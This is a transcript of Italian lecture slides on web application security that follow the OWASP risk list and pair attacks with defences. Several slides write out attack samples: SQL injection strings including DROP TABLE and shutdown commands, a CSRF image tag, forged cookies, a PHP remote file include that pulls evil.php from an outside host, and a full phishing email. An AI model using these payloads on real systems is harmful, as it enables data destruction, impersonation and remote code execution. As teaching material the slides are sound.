Sicurezza delle applicazioni Web

Transcript

1 Sicurezza delle applicazioni Web

2 Sicurezza delle applicazioni web [ ] Web application security deals with the overall Web application architecture, logic, coding, and content of the Web application. In other words, Web applications security is not about operating system vulnerability or the security defects in your commercial products; it is about the vulnerabilities of your own software. [ ]

3 Concetti di WebAppSec Richiesta HTTP request (cleartext or SSL) Accept from ANY via HTTP/HTTPS Allow SQL SQL Databas e Risposta Web server App. server DataBase HTTP reply (HTML, Javascript, VBscript, etc) Transport layer HTTP/ HTTPS over TCP/IP Apache IIS Netscape etc Plugins: Perl C/C++ JSP, etc Database connection: ADO, ODBC, etc. OWASP

4 Vulnerabilità nelle applicazioni web OWASP(Open Web Application Security Project) mantiene la lista delle vulnerabilità più critiche di un'applicazione web Unvalidated Input Broken Access Control Broken Authentication and Session Management Cross Site Scripting (XSS) Flaws Buffer Overflow Injection Flaws Improper Error Handling Insecure Storage Denial of Service Insecure Configuration Management

5 Mancanza di controllo dell'input Le informazioni ricevute a seguito di una richiesta non vengono validate. Questa tecnica può essere utilizzata per accedere alla parte di back-end Prima regola: non fidarsi mai delle informazioni fornite dal client nelle richieste HTTP (cookie, ID di sessione, parametri, header, referer)

6 Mancanza di controllo dell'input Parametri da controllare Il tipo di dato (string, integer, real, etc ) Il set di caratteri consentito La lunghezza minima e massima Controllare se è permesso il tipo NULL Controllare se il parametro è richiesto o meno Intervallo numerico

7 Unvalidated Input esempio (1) Manipolazione dei parametri inviati: Hidden Field Manipulation OWASP

8 Unvalidated Input esempio (2) Altero il valore in OWASP

9 Unvalidated Input esempio (3) OWASP

10 Unvalidated Input esempio (4) OWASP

11 Autenticazione insufficiente Avviene quando un attaccante può accedere ad informazioni riservate senza autenticarsi. Gli strumenti di amministrazione via web forniscono un esempio di accesso ad informazioni riservate Qualche volta le risorse sono protette nascondendo l'url che permette l'accesso ad un'area protetta che di solito viene messa nella directory /admin

12 Autenticazione insufficiente Si tratta di un approccio del tipo Security Through Obscurity. Anche se la risorsa non è direttamente accessibile, non vuol dire che sia davvero protetta L'URL potrebbe essere scoperta mediante un attacco brute force che prova i nomi di file e directory più comuni, attraverso l'analisi di messaggi di errore, dei file di log

13 Semantic URL attack Cosa succede se cambiamo il valore del parametro user?

14 File Upload attack <form action= upload.php method= POST enctype= multipart/form-data > <input type= file name= attchment > <input type= hidden name= MAX_FILE_SIZE value= 1024 > </form> Lato server si devono prendere provvedimenti per forzare la dimensione massima dei file che si possono copiare (in PHP esistono le direttive upload_max_filesize, post_max_size)

15 Broken Authentication Meccanismi di autenticazione non adeguati OWASP

16 Broken Authentication (2) OWASP

17 Referer spoofing Il campo referer dell'header HTTP contiene l'url di provenienza della richiesta Se un sito protegge le pagine consentendone la visualizzazione quando la richiesta proviene da un determinato insieme di URL, recuperando uno dei referer validi è possibile forgiare una richiesta che sarà accettata dal server

18 Gestione delle sessioni In alcuni casi i siti web permettono di riutilizzare vecchie sessioni senza farle scadere in modo appropriato - per fornire l'accesso ad un'area protetta Un attaccante potrebbe intercettare un session ID attraverso uno sniffer di rete o un attacco di tipo cross-site scripting e riutilizzarlo per impersonare un altro utente In una postazione pubblica un attaccante, usando il pulsante Back del browser, potrebbe accedere alle pagine visitate in precedenza dalla vittima

19 Concetto di gestione della sessione nel mondo reale Mario Rossi Dipendente Banca A. Ferrari Num. 33 Firma: A.Ferrari Carta di identità Mario Rossi Buongiorno Mario Rossi Ticket #33 Verifica identità in base alla carta di identità Ticket #33: mi dia 1000 euro dal mio conto Tenga 1000 euro Sig. Rossi Verifica identità in base al ticket OWASP

20 Gestione della sessione web --Procedura di autenticazione-- Mario Rosssi Web Server [1] https://www.mia-banca.it [2] Invio form di autenticazione via HTTPS Username/password Cookie=TWFyaW8123 Token di autenticazione [3] inserisce username/password via HTTPS [4] Welcome page personale e Set Cookie=TWFyaW8123 Verifica credenziali: se ok client autenticato Generazione del cookie --Richieste seguenti-- [5] Richiesta dell estratto CC (https://www. mia-banca.it/cont.jsp) [6] Invio del contenuto Cookie=TWFyaW8123 Verifica del cookie: Identifica il mittente Invio del contenuto al DEST OWASP

21 Furto di identità Mario Rossi Se altero la GET HTTP, forgiando il cookie sono in grado di accedere al contenuto di un altra persona Per implementare una corretta gestione delle sessioni è necessario proteggere sia le credenziali di autenticazione di un utente che i token di sessione generati dal server ed assegnati all utente [5a]Richiesta dell estratto CC (https://www. mia-banca.it/cont.jsp) Cookie=TWFyaW8122 [6a] Invio del contenuto di Paolo Verdi Verifica del cookie: TWFyaW8122 Identifica il mittente Paolo Verdi Invio del contenuto di Paolo Verdi al destinatario Mario Rossi I dati relativi all utenza di Verdi non sono stati adeguatamente protetti OWASP

22 SQL Injection SQL Injection is a technique for exploiting web applications that use clientsupported data in SQL queries without stripping potentially harmful characters first

23 SQL Injection $sql = SELECT * FROM client WHERE username=. $_POST['username']. AND password=. $_POST['password']. ; Esempi SELECT * FROM client WHERE username= Rossi AND password= **** SELECT * FROM client WHERE username= Rossi OR 1=1 -- Commento in molti DBMS!

24 SQL Injection (in ASP)

25 SQL Injection Username:rossi, Password:******* Username:verdi, Password:******* Username: OR = Passowrd: OR = SELECT * FROM client WHERE username= OR = AND password= OR = true!!

26 SQL Injection (in ASP)

27 SQL Injection Username: ; DROP TABLE clienti-- (per Transact-SQL, usato da SQL server) userid: 123; shutdown-- Per saperne di più

28 Soluzione? Validare sempre molto bene i dati in input usando, se possibile, le espressioni regolari Suggerimento: considerate quali sono i dati validi e rifiutate tutto il resto

29 Cross-Site Request Forgeries Permette ad un attaccante di far spedire richieste HTTP arbitrarie alla vittima <html> <body> testo qui testo qui testo qui<br/> <img src="http://.../compra.php? item=penne&quantity=10"> </body> </html>

30 Cross-Site Request Forgeries File compra.php <?php // controllo sessione $item = $_REQUEST['item']; $quantity = $_REQUEST['quantity']; $out = "Ho appena ricevuto un ordine per $quantity $item!!!\n"; $fp=fopen('ordini.txt','a'); fwrite($fp,$out); fclose($fp);?>

31 Cross-Site Request Forgeries Come difendersi? Non usare $_REQUEST ma scegliere $_POST oppure $_GET Verificare che i dati arrivino davvero dal form che è stato predisposto Si può introdurre nei form un valid token, per esempio un numero generato in modo casuale o un timestamp che viene anche memorizzato in una variabile di sessione dell'utente

32 Web cookies: not just a privacy risk DoubleClick (e altri) usa i cookie per tracciare gli utenti e per mandare messaggi pubblicitari mirati. Ma questo non è un vero pericolo Il pericolo nasce quando i cookie vengono usati per l'autenticazione e, soprattutto, quando vengono fornite informazioni personalizzate

33 Web cookies: not just a privacy risk La specifica dei cookie si basa infatti su un'idea di collaborazione tra browser e server e molti siti non salvano i cookie in modo sicuro Diventa facile forgiare un nuovo cookie per impersonare un altro utente Quindi, è opportuno non affidarsi mai al solo meccanismo dei cookie per restituire informazioni sensibili

34 Errata gestione della sessione - Furto di identità Cookie poisoning Alterando campi forniti al client tramite un cookie (stato), un attaccante può impersonare un utente per accedere a servizi web. Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30gmt ; Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30gmt ; Cookie guessable Cookie:aefdsg6757nb90 ; M.Rossi Cookie:aefdsg6757nb92 ; G.Verdi Cookie:aefdsg6757nb9? ; V.Bianchi OWASP

35 Homograph Attack Il problema sorge a causa dell'equivalenza visiva tra le lettere di alfabeti diversi Siamo abituati a confondere 0 (zero) con O (o maiuscola) ma esistono altri caratteri che pur essendo visivamente simili, sono semanticamente molto diversi! Nel cirillico ci sono per esempio le lettere a, c, e, p, y, x,

36 Homograph Attack John Hacker imita il nome del sito web della vostra banca Installa un proxy che instrada in modo trasparente tutte le vostre richieste alla vostra banca Inserisce il suo link nei portali più importanti

37 Homograph Attack Poiché la maggior parte delle volte clicchiamo sui link e non li scriviamo direttamente nella location bar John Hacker ha accesso a login e password dei clienti della banca Per saperne di più

38 Phishing Tecnica di ingegneria sociale utilizzata per ottenere l'accesso ad informazioni personali e riservate con la finalità del furto di identità, mediante l'utilizzo di messaggi di posta elettronica fasulli oppurtunamente creati per apparire autentici

39 Esempio di phishing Cari clienti della banca via Internet Imprese. Vorremmo informarvi l'indirizzo fisso del nuovo web server del servizio online banking - A causa sovraccarico del nostro generale server la nostra zona tecnica e allargata con l'aggiunta di nuovo server attualmente nella fase di test. Vi pregiamo essere soggetti alla procedura obbligatoria d'autenticazione al nuovo server per far transferire i Vostri dati d'utente con successo alla base dei dati del nuovo piu protetto server del servizio online banking. continua

40 Esempio di phishing 1.Aprite la web pagina 2.Inserite nel Vostro conto online usando la combinazione Codice i Pin. 3.Per evitare la perdita dei Vostri dati personali e per la protezione contro assalti di "Phishing" si prega di sempre chiudere la finestra del Vostro Internet Browser al termine di lavori con la banca online. Vi pregiamo distinti saluti, il servizio d'assistenza tecnica della banca online ByBank

41 Rappresentazione canonica Do not make any security decision based on the name of a resource, especially a filename Esistono nomi diversi per identificare la stessa risorsa /home/stud/2000s000/index.html ~2000s000/index.html /home/../home/stud/ Il nome canonico è quello più semplice (lo standard)

42 Bypassing Napster Name Filtering Canonicalization bug Il blocco delle canzoni è stato fatto sulla base del nome della canzone e non ci è voluto molto a bypassare il filtro.. changes the file names of songs inside a person's Napster directory into a spelling inspired by Pig Latin. The Radiohead song "Karma Police," for example, would be transformed into "armak olicep."

43 Come possiamo difenderci?

44 Difesa in profondità Si tratta di un principio ben noto tra i professionisti di sicurezza E importante avere delle salvaguardie ridondanti. Per esempio è una buona pratica richiedere nuovamente la password ad un utente autenticato quando si devono svolgere azioni importanti

45 Minimo Privilegio Fornire privilegi non necessari può aumentare i rischi di una applicazione Lo abbiamo visto quando abbiamo discusso i privilegi degli utenti di MySQL

46 Minimizzare l'esposizione Le applicazioni web richiedono comunicazioni frequenti con sorgenti di dati remote Diventa importante fare il tracking dei dati per capire quali sono i dati esposti Ad esempio, nel caso di pagamento con carta di credito si dovrebbe usare SSL per proteggere la fase di verifica delle informazioni sulla carta di credito perché queste vengono mandate al client e quindi esposte nella rete Internet

47 Tracciare i dati Bisogna distinguere tra i dati dei quali ci si può fidare e di quelli che invece non sono fidati Si deve capire quali sono i dati che entrano nell'applicazione e quali sono i dati che escono Es: echo -> dati in uscita mysql_query -> dati in ingresso al database

48 Filtrare l'input Identificare l'input Filtrare l'input Distinguere tra input filtrato e input non filtrato (tainted)

49 In PHP: Register Globals Con la direttiva register_globals = On vengono create in automatico delle variabili globali a partire da molte sorgenti remote (moduli, database, cookie, sessioni) Se abilitata, questa direttiva nasconde l'origine dei dati e questo può aprire delle vulnerabilità nel codice PHP

50 Esempio: PHP File Include Attack Con le register globals = On viene creata la variabile $name inizializzata al valore 'value' La funzione include() di PHP permette anche di includere file esterni

51 Esempio: PHP File Include Attack <?php include($vuln);?> 1) GET /a.php?vuln=http://webhost.com/evil.php attacker target 4) Output of evil.php is sent to the attacker webhost.com 2) Target makes request to webhost.com/evil.php 3) The malicious PHP file 'evil.php' is sent to the Target and is executed by the include() function.

52 In PHP: Filtrare l'input Gli array superglobali permettono di identificare l'origine dei dati ($_POST, $_GET, $_COOKIES, ) Anche $_SERVER contiene dati in arrivo dall esterno che possono essere manipolati $_SESSION Dati in arrivo dai database

53 In PHP: Filtrare l'input Non si deve mai cercare di correggere i dati in arrivo, ma si deve obbligare l utente ad inserire dati corretti Si possono usare convenzioni nei nomi per distingure tra dati filtrati e dati non filtrati. Ad esempio, si possono copiare i dati filtrati in un array $clean[] e usare solo i dati in questo array per la logica dell applicazione (NB. l'array $clean[] va inizializzato!)

54 In PHP: Escape dell'output Identificare l'output (echo, printf, print, <?=) Escape dell'output Dipende ovviamente dal tipo di sistema cui si spediscono i dati. Ad esempio, nel caso del browser, si può usare la funzione htmlentities(). Nel caso di MySQL, se non esiste una funzione di escape nativa si può usare la funzione addslashes() Distinguere tra dati escaped e dati non escaped

55 In PHP: Error Reporting Non si dovrebbero mai rendere pubbliche le informazioni che vengono restituite da PHP in caso di errore Nel file php.ini display_errors = Off log_errors = On error_log = nomefile error_reporting = E_ALL Da programma PHP <? ini_set( display_errors, Off ); ini_set( log_errors, On ); ini_set( error_log, /usr/local/ ); ini_set( error_reporting, E_ALL );?>

56 Insecure Configuration Management È diffusa la pratica di non eliminare oggetti o codici sorgenti non più necessari per l erogazione del servizio dai quali è spesso possibile ottenere informazioni critiche per il sistema. Vulnerabiltà note non corrette all interno dei software installati nel server Vulnerabilità all interno dei software installati nel server oppure configurazioni errate che permettono di eseguire attacchi Presenza di contenuti non necessari quali pagine di defaut, backup di dati, script, applicazioni, file di configurazione e vecchie pagine web Come proteggersi? Eliminare tutto ciò che non è necessario OWASP

57 Il problema è sociale... [...]is much easier to trick someone into giving a password for a system than to spend the effort to hack into the system. [...] it was the single most effective method in my arsenal. Kevin Mitnick